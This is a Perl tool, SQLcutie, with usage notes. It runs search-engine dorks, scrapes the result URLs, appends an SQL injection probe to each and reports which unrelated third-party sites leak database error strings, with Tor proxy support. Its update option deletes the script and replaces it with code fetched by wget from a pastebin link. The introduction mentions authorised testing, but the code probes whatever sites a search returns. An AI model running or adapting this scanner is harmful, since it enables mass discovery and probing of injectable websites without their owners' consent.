SQLcutie



SQLcutie is a stand-alone, improved dorker derived from SQLcute. It recognises database error strings from roughly ten engines/drivers (MySQL, MariaDB, Microsoft SQL Server and Access via ODBC, OLE DB and JET, ADO DB, PostgreSQL, Oracle/JDBC and Sybase) and reports the matched type for each hit.

The goal of this dorker is not to help script kiddies cause more damage; it is an attempt to serve the specific needs of security professionals. Note that it sends an active SQL injection probe (an `ORDER BY` on an impossible column index) to every URL it discovers, so only run it against systems you are authorised to test.

  1. #!/usr/bin/perl
=for comment
*-----------------------------------------------------------*
|                                                           |
|  SQLCutie 1.1                                             |
|  by MadFedora                                             |
|                                                           |
|  This is the stand-alone dorker version of SQLCute,       |
|  with more accurate vulnerability detection and a wider   |
|  range of database types.                                 |
|                                                           |
|  This script is updated regularly; see the update option  |
|  in the help menu.                                        |
*-----------------------------------------------------------*
=cut
use strict;
use warnings;

use HTTP::Request;
use LWP::UserAgent;
use Term::ANSIColor qw(:constants);

# Script-wide state shared between variables() (which fills it from the
# command line), the search/scan subs and the top-level run. Declared here
# so that `use strict` is satisfied in every sub that touches it.
our ($search_dork, $vulnfile, $proxy, $i);
our (@mysqlvuln, @mssqlvuln, @accessvuln);
  18.  
  19. #-----------------------------------------------------------#
  20. # Help menu #
  21. #-----------------------------------------------------------#
  22.  
  23. sub help
  24. {
  25. system('clear');
  26. system('title SQLCutie 1.1');
  27. print BLUE, "[!] Usage : perl $0 <option>\n";
  28. print GREEN, "-----------------------------------";
  29. print BOLD, GREEN, "\n--|| Options\n\n", RESET;
  30. print GREEN, " --dork Dorking function (dorkhelp)\n";
  31. print GREEN, " --proxy Define a proxy to use (proxyhelp)\n";
  32. print " --output Save scan result in an outside file\n";
  33. print " --help Print this help manual\n";
  34. print " --readme README\n";
  35. print " --dorkhelp Print dork help manual\n";
  36. print " --proxyhelp Print proxy help manual\n";
  37. print " --update Update to latest version\n";
  38. print "-----------------------------------\n", RESET;
  39. exit();
  40. }
  41.  
  42. sub readme
  43. {
  44. system('clear');
  45. system('title SQLCutie 1.1');
  46. print BOLD,GREEN," \n SQLCutie ",YELLOW,"1.1\n",RESET;
  47. print "This project was started at ",YELLOW,"09/20/2013\n",RESET;
  48. print GREEN,"Improvement: \n",RESET;
  49. print BLUE,"-- Over 10 types of DB\n";
  50. print "-- Better dork response\n";
  51. print "-- More accurated error responses\n";
  52. print "-- Better help UI\n";
  53. print "-- Update support\n",RESET;
  54. print BOLD, GREEN, "If anyone looking toward to improve this piece of crap\nFeel free to do so!\n",RESET;
  55. print BLUE,"perl $0 --help\n\n";
  56. exit();
  57. }
  58.  
  59. sub dorkhelp
  60. {
  61. system('clear');
  62. system('title SQLCutie 1.1');
  63. print GREEN, "\n[?] Example: ./sqlcutie php?id=\n";
  64. print " ./sqlcutie php?id=+ottawa\n";
  65. print " ./sqlcutie inurl:php?id=+intitle:ottawa\n";
  66. print " ./sqlcutie intext:world+filetype:pl\n";
  67. print " ./sqlcutie funny+AND+joyful+asp?id=\n",RESET;
  68. print YELLOW,"[!] You can use basically any Google dork query except brackets\n",RESET;
  69. print BLUE,"perl $0 --help\n\n";
  70. exit();
  71. }
  72.  
  73. sub proxyhelp
  74. {
  75. system('clear');
  76. system('title SQLCutie 1.1');
  77. print GREEN,"\n[?] Example: ./sqlcutie --proxy ",BOLD,"http://127.0.0.1:9050/\n",RESET;
  78. print BLUE,"perl $0 --help\n\n";
  79. exit();
  80. }
  81.  
  82. sub update
  83. {
  84. system('clear');
  85. system('title SQLCutie 1.1');
  86. print GREEN,"\n[!] Updating...\n";
  87. system('rm -r sqlcutie ; wget http://pastebin.com/raw.php?i=NdVZ5HVX -O ./sqlcutie ; chmod u+x ./sqlcutie');
  88. print BOLD,"";
  89. system('echo "For what changed run: perl sqlcutie --readme"');
  90. print "\n",RESET;
  91. exit();
  92. }
  93.  
  94. sub variables
  95. {
  96. my $i=0;
  97. foreach (@ARGV)
  98. {
  99. if ($ARGV[$i] eq "--dork"){$search_dork = $ARGV[$i+1]}
  100. if ($ARGV[$i] eq "--output"){$vulnfile = $ARGV[$i+1]}
  101. if ($ARGV[$i] eq "--proxy"){$proxy = $ARGV[$i+1]}
  102. if ($ARGV[$i] eq "--help"){&help}
  103. if ($ARGV[$i] eq "--readme"){&readme}
  104. if ($ARGV[$i] eq "--dorkhelp"){&dorkhelp}
  105. if ($ARGV[$i] eq "--proxyhelp"){&proxyhelp}
  106. if ($ARGV[$i] eq "--update"){&update}
  107. $i++;
  108. }
  109. }
  110.  
  111. sub main
  112. {
  113. system('clear');
  114. system('title SQLCutie 1.1');
  115. print GREEN, " \n--------------------------------------\n";
  116. print BOLD," \n SQLCutie ",YELLOW,"1.1\n",RESET;
  117. print BLUE," \n madfedora";
  118. print " \n madfedora\@mail.riseup.net\n",RESET;
  119. print GREEN," \n--------------------------------------\n\n",RESET;
  120. if (@ARGV+1){print GREEN,"[?] For Help : ",BOLD,"perl $0 --help\n\n",RESET;}
  121. }
  122.  
  123. sub vulnscanner
  124. {
  125. checksearch();
  126. search1($search_dork);
  127. search2($search_dork);
  128. }
  129. sub checksearch
  130. {
  131. #my $request = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
  132. my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=60");
  133. #-----------------------------------------------------------#
  134. # Change page numbers above #
  135. #-----------------------------------------------------------#
  136. my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/531.6.2 (KHTML, like Gecko) Version/5.1 Safari/531.6.2' || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_5 rv:6.0) Gecko/20100731 Firefox/3.6.8' || 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/5.1)');
  137. $useragent->proxy("http", "http://$proxy/") if defined($proxy);
  138. my $response = $useragent->request($request) ;
  139. my $result = $response->content;
  140. }
  141.  
  142. sub search1
  143. {
  144. my $dork = $_[0];
  145. for ($i=0;$i<200;$i=$i+10)
  146. {
  147. my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=$i");
  148. my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0(X11; Linux i686) AppleWebKit/5310 (KHTML, like Gecko) Chrome/13.0.889.0 Safari/5310');
  149. $useragent->proxy("http", "http://$proxy/") if defined($proxy);
  150. my $response = $useragent->request($request) ;
  151. my $result = $response->content;
  152. while ($result =~ m/class=r><a href=\"(.*?)\" class=l>/g )
  153. {
  154. print BLUE, "[!] Dorking > $1\n", RESET;
  155. checkvuln($1)
  156. }
  157. }
  158. }
  159. sub search2
  160. {
  161. my $dork = $_[0];
  162. for ($i=0;$i<20;$i++)
  163. {
  164. my $request = HTTP::Request->new(GET => "http://uk.ask.com/web?q=$dork&page=$i&dm=all");
  165. my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0');
  166. $useragent->proxy("http", "http://$proxy/") if defined($proxy);
  167. my $response = $useragent->request($request) ;
  168. my $result = $response->content;
  169. while ($result =~ m/<span id=\"r(.*)_u\" class=\"(.*)\">(.*)<\/span>/gi)
  170. {
  171. my $askurl ="http://".$3 ;
  172. print BLUE, "[!] Dorking > $askurl\n",RESET;
  173. checkvuln($askurl);
  174. }
  175. }
  176. }
  177.  
  178. sub checkvuln
  179. {
  180. my $scan_url = $_[0];
  181. my $link = $scan_url.'0+order+by+9999999--';
  182. my $ua = LWP::UserAgent->new();
  183. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  184. my $req = $ua->get($link);
  185. my $fuzz = $req->content;
  186. #-----------------------------------------------------------#
  187. # MySQL #
  188. #-----------------------------------------------------------#
  189. if ($fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/mysql_numrow/i)
  190.  
  191. {
  192. print BOLD, GREEN, "[!] MySQL Num Row -> $scan_url\n", RESET;
  193. if (defined($vulnfile))
  194. {
  195. push (@mysqlvuln,"$scan_url\n");
  196. }
  197. }
  198.  
  199. elsif ($fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/FetchRow()/i|| $fuzz =~ m/GetArray()/i )
  200. {
  201. print BOLD, GREEN, "[!] MySQL Fetch (Array/Row) -> $scan_url\n", RESET;
  202. if (defined($vulnfile))
  203. {
  204. push (@mysqlvuln,"$scan_url\n");
  205. }
  206. }
  207.  
  208. elsif ($fuzz =~ m/Unexpected EOF found when reading file/i)
  209. {
  210. print BOLD, GREEN, "[!] MySQL EOF -> $scan_url\n", RESET;
  211. print BOLD, WHITE "[*] Possible Injection\n", RESET;
  212. if (defined($vulnfile))
  213. {
  214. push (@mysqlvuln,"$scan_url\n");
  215. }
  216. }
  217.  
  218. elsif ($fuzz =~ m/Triggers can not be created on system tables/i)
  219. {
  220. print BOLD, GREEN, "[!] MySQL NO TRIGGERS -> $scan_url\n", RESET;
  221. if (defined($vulnfile))
  222. {
  223. push (@mysqlvuln,"$scan_url\n");
  224. }
  225. }
  226. elsif ($fuzz =~ m/Can't get working directory/i)
  227. {
  228. print BOLD, GREEN, "[!] MySQL Directory -> $scan_url\n", RESET;
  229. if (defined($vulnfile))
  230. {
  231. push (@mysqlvuln,"$scan_url\n");
  232. }
  233. }
  234. elsif ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i)
  235. {
  236. print BOLD, GREEN, "[!] MySQL Error Misc -> $scan_url\n", RESET;
  237. print BOLD, WHITE "[*] Possible Injection\n", RESET;
  238. if (defined($vulnfile))
  239. {
  240. push (@mysqlvuln,"$scan_url\n");
  241. }
  242. }
  243. #-----------------------------------------------------------#
  244. # Microsoft OLE/ODBC/JET [MsSQL/Access] #
  245. #-----------------------------------------------------------#
  246. elsif ($fuzz =~ m/ODBC SQL Server Driver/i || $fuzz =~ m/ODBC Microsoft Access Driver/i || $fuzz =~ m/OLE DB Provider for ODBC/i)
  247. {
  248. print BOLD, GREEN, "[!] Microsoft ODBC [Access] -> $scan_url\n", RESET;
  249. if (defined($vulnfile))
  250. {
  251. push (@accessvuln,"$scan_url\n");
  252. }
  253. }
  254. elsif ($fuzz =~ m/Microsoft OLE DB Provider for SQL Server/i || $fuzz =~ m/Unclosed quotation mark/i)
  255. {
  256. print BOLD, GREEN, "[!] Microsoft OLE DB [MsSQL] -> $scan_url\n", RESET;
  257. print BOLD, WHITE "[*] Possible Injection\n", RESET;
  258. if (defined($vulnfile))
  259. {
  260. push (@mssqlvuln,"$scan_url\n");
  261. }
  262. }
  263. elsif ($fuzz =~ m/VBScript Runtime/i)
  264. {
  265. print BOLD, GREEN, "[!] VBScript Runtime -> $scan_url\n", RESET;
  266. print BOLD, YELLOW "[*] Not Injectable\n", RESET;
  267. if (defined($vulnfile))
  268. {
  269. push (@mssqlvuln,"$scan_url\n");
  270. }
  271. }
  272. elsif ($fuzz =~ m/Microsoft JET Database/i)
  273. {
  274. print BOLD, GREEN, "[!] Microsoft JET [Access] -> $scan_url\n", RESET;
  275. if (defined($vulnfile))
  276. {
  277. push (@accessvuln,"$scan_url\n");
  278. }
  279. }
  280. #-----------------------------------------------------------#
  281. # ADO DB #
  282. #-----------------------------------------------------------#
  283. elsif ($fuzz =~ m/Invalid Querystring/i)
  284. {
  285. print BOLD, GREEN, "[!] ADO DB Invalid Querystring -> $scan_url\n", RESET;
  286. if (defined($vulnfile))
  287. {
  288. push (@mssqlvuln,"$scan_url\n");
  289. }
  290. }
  291. elsif ($fuzz =~ m/ADODB.Field/i)
  292. {
  293. print BOLD, GREEN, "[!] ADO DB ADODB.Field -> $scan_url\n", RESET;
  294. if (defined($vulnfile))
  295. {
  296. push (@mssqlvuln,"$scan_url\n");
  297. }
  298. }
  299. elsif ($fuzz =~ m/ADODB.Command/i )
  300. {
  301. print BOLD, GREEN, "[!] ADO DB ADODB.Command -> $scan_url\n", RESET;
  302. if (defined($vulnfile))
  303. {
  304. push (@mssqlvuln,"$scan_url\n");
  305. }
  306. }
  307. elsif ($fuzz =~ m/BOF or EOF/i)
  308. {
  309. print BOLD, GREEN, "[!] ADO DB BOF or EOF -> $scan_url\n", RESET;
  310. if (defined($vulnfile))
  311. {
  312. push (@mssqlvuln,"$scan_url\n");
  313. }
  314. }
  315. #-----------------------------------------------------------#
  316. # PostgreSQL #
  317. #-----------------------------------------------------------#
  318. elsif ($fuzz =~ m/postgresql.util/i || $fuzz =~ m/psql: could not connect to server/i || $fuzz =~ m/psql: FATAL/i || $fuzz =~ m/dynamic_result_sets_returned/i || $fuzz =~ m/null_value_eliminated_in_set_function/i || $fuzz =~ m/ERROR: invalid input syntax for integer/i )
  319. {
  320. print BOLD, GREEN, "[!] PosgreSQL -> $scan_url\n", RESET;
  321. if (defined($vulnfile))
  322. {
  323. push (@mssqlvuln,"$scan_url\n");
  324. }
  325. }
  326. #-----------------------------------------------------------#
  327. # Oracle #
  328. #-----------------------------------------------------------#
  329. elsif ($fuzz =~ m/oracle.jdbc/i || $fuzz =~ m/system.data.oledb/i )
  330. {
  331. print BOLD, GREEN, "[!] JDBC -> $scan_url\n", RESET;
  332. if (defined($vulnfile))
  333. {
  334. push (@mssqlvuln,"$scan_url\n");
  335. }
  336. }
  337. #-----------------------------------------------------------#
  338. # Sybase #
  339. #-----------------------------------------------------------#
  340. elsif ($fuzz =~ m/Warning: sybase_query()/i || $fuzz =~ m/sybase_fetch_assoc()/i )
  341. {
  342. print BOLD, GREEN, "[!] Sybase -> $scan_url\n", RESET;
  343. if (defined($vulnfile))
  344. {
  345. push (@mssqlvuln,"$scan_url\n");
  346. }
  347. }
  348. #-----------------------------------------------------------#
  349. # MariaDB #
  350. #-----------------------------------------------------------#
  351. elsif ($fuzz =~ m/ERROR 1712 (HY000)/i )
  352. {
  353. print BOLD, GREEN, "[!] MariaDB Index Corruption -> $scan_url\n", RESET;
  354. if (defined($vulnfile))
  355. {
  356. push (@mssqlvuln,"$scan_url\n");
  357. }
  358. }
  359. elsif ($fuzz =~ m/ER_QUERY_EXCEEDED_ROWS_EXAMINED_LIMIT/i )
  360. {
  361. print BOLD, GREEN, "[!] MariaDB Query Excecution Corrupted -> $scan_url\n", RESET;
  362. if (defined($vulnfile))
  363. {
  364. push (@mssqlvuln,"$scan_url\n");
  365. }
  366. }
  367. elsif ($fuzz =~ m/ER_QUERY_CACHE_IS_GLOBALY_DISABLED/i )
  368. {
  369. print BOLD, GREEN, "[!] MariaDB Query cache is globally disabled -> $scan_url\n", RESET;
  370. if (defined($vulnfile))
  371. {
  372. push (@mssqlvuln,"$scan_url\n");
  373. }
  374. }
  375. elsif ($fuzz =~ m/ER_DYN_COL_IMPLEMENTATION_LIMIT/i )
  376. {
  377. print BOLD, GREEN, "[!] MariaDB Dynamic column implementation limit -> $scan_url\n", RESET;
  378. if (defined($vulnfile))
  379. {
  380. push (@mssqlvuln,"$scan_url\n");
  381. }
  382. }
  383. }
  384. variables();
  385. main();
  386.  
  387. if (defined($search_dork))
  388. {
  389. print BOLD,GREEN,"[+] Vulnerability Scan\n" ;
  390. print "[+] Dork : $search_dork\n\n\n",RESET;
  391. vulnscanner();
  392. if (defined($vulnfile))
  393. {
  394. open(vuln_file,">>$vulnfile") ;
  395. print vuln_file @mysqlvuln;
  396. print vuln_file @mssqlvuln;
  397. print vuln_file @accessvuln;
  398. close(vuln_file);
  399. print YELLOW,"[+] Result Saved to $vulnfile\n",RESET;
  400. exit();
  401. if (!defined($search_dork))
  402. {
  403. print YELLOW,"[!] Please enter the correct query, example ",BOLD,"inurl:php?id=+world\n",RESET;
  404. exit();
  405. }
  406. if (!defined($proxy))
  407. {
  408. print YELLOW,"[!] Please enter the correct proxy, example ",BOLD,"http://127.0.0.1:8080/\n",RESET;
  409. exit();
  410. }
  411. }
  412. }
  413. #-----------------------------------------------------------#
  414. # End #
  415. #-----------------------------------------------------------#
